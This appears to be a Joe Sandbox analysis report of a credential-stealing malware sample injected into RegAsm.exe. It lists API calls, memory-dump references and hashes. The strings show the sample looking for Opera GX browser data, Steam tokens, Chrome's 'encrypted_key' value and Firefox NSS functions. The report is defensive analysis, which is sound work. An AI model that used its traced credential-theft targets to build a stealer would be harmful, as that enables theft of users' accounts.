                                                                                                        Similarity
                                                                                                        • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                        • String ID: ERROR$ERROR
                                                                                                        • API String ID: 3086566538-2579291623
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateObjectSingleSleepThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 4198075804-0
                                                                                                        APIs
                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1065093856-0
                                                                                                        APIs
                                                                                                        • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C093095
                                                                                                          • Part of subcall function 6C0935A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C11F688,00001000), ref: 6C0935D5
                                                                                                          • Part of subcall function 6C0935A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0935E0
                                                                                                          • Part of subcall function 6C0935A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C0935FD
                                                                                                          • Part of subcall function 6C0935A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C09363F
                                                                                                          • Part of subcall function 6C0935A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C09369F
                                                                                                          • Part of subcall function 6C0935A0: __aulldiv.LIBCMT ref: 6C0936E4
                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C09309F
                                                                                                          • Part of subcall function 6C0B5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0B56EE,?,00000001), ref: 6C0B5B85
                                                                                                          • Part of subcall function 6C0B5B50: EnterCriticalSection.KERNEL32(6C11F688,?,?,?,6C0B56EE,?,00000001), ref: 6C0B5B90
                                                                                                          • Part of subcall function 6C0B5B50: LeaveCriticalSection.KERNEL32(6C11F688,?,?,?,6C0B56EE,?,00000001), ref: 6C0B5BD8
                                                                                                          • Part of subcall function 6C0B5B50: GetTickCount64.KERNEL32 ref: 6C0B5BE4
                                                                                                        • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C0930BE
                                                                                                          • Part of subcall function 6C0930F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C093127
                                                                                                          • Part of subcall function 6C0930F0: __aulldiv.LIBCMT ref: 6C093140
                                                                                                          • Part of subcall function 6C0CAB2A: __onexit.LIBCMT ref: 6C0CAB30
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                        • String ID:
                                                                                                        • API String ID: 4291168024-0
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                        • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocComputerNameProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 4203777966-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                          • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                        • String ID: Opera GX
                                                                                                        • API String ID: 1719890681-3280151751
                                                                                                        APIs
                                                                                                        • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-3916222277
                                                                                                        • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                        • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                                        • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                        • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        Strings
                                                                                                        • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                        • String ID: Soft\Steam\steam_tokens.txt
                                                                                                        • API String ID: 502913869-3507145866
                                                                                                        • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                        • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                                        • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                        • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                                        APIs
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocLocal
                                                                                                        • String ID: 1iA
                                                                                                        • API String ID: 3494564517-1863120733
                                                                                                        • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                        • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                                                        • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                        • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                        • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                                        • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                        • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                                        APIs
                                                                                                        • malloc.MSVCRT ref: 0041CBC9
                                                                                                          • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                          • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                          • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                        • malloc.MSVCRT ref: 0041CC06
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: malloc$lstrcpylstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2974738957-0
                                                                                                        • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                        • Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
                                                                                                        • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                        • Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                        • Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
                                                                                                        • Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                        • Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FolderPathlstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1699248803-0
                                                                                                        APIs
                                                                                                        • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2803490479-0
                                                                                                        APIs
                                                                                                        • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0A6CCC
                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0A6D11
                                                                                                        • moz_xmalloc.MOZGLUE(0000000C), ref: 6C0A6D26
                                                                                                          • Part of subcall function 6C0ACA10: malloc.MOZGLUE(?), ref: 6C0ACA26
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C0A6D35
                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0A6D53
                                                                                                        • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C0A6D73
                                                                                                        • free.MOZGLUE(00000000), ref: 6C0A6D80
                                                                                                        • CertGetNameStringW.CRYPT32 ref: 6C0A6DC0
                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C0A6DDC
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0A6DEB
                                                                                                        • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C0A6DFF
                                                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C0A6E10
                                                                                                        • CryptMsgClose.CRYPT32(00000000), ref: 6C0A6E27
                                                                                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C0A6E34
                                                                                                        • CreateFileW.KERNEL32 ref: 6C0A6EF9
                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C0A6F7D
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0A6F8C
                                                                                                        • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C0A709D
                                                                                                        • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0A7103
                                                                                                        • free.MOZGLUE(00000000), ref: 6C0A7153
                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C0A7176
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A7209
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A723A
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A726B
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A729C
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A72DC
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0A730D
                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0A73C2
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A73F3
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A73FF
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A7406
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A740D
                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0A741A
                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C0A755A
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0A7568
                                                                                                        • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C0A7585
                                                                                                        • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C0A7598
                                                                                                        • free.MOZGLUE(00000000), ref: 6C0A75AC
                                                                                                          • Part of subcall function 6C0CAB89: EnterCriticalSection.KERNEL32(6C11E370,?,?,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284), ref: 6C0CAB94
                                                                                                          • Part of subcall function 6C0CAB89: LeaveCriticalSection.KERNEL32(6C11E370,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C0CABD1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                        • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                        • API String ID: 3256780453-3980470659
                                                                                                        APIs
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C1F601B,?,00000000,?), ref: 6C21486F
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C2148A8
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C2148BE
                                                                                                        • NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C2148DE
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C2148F5
                                                                                                        • NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C21490A
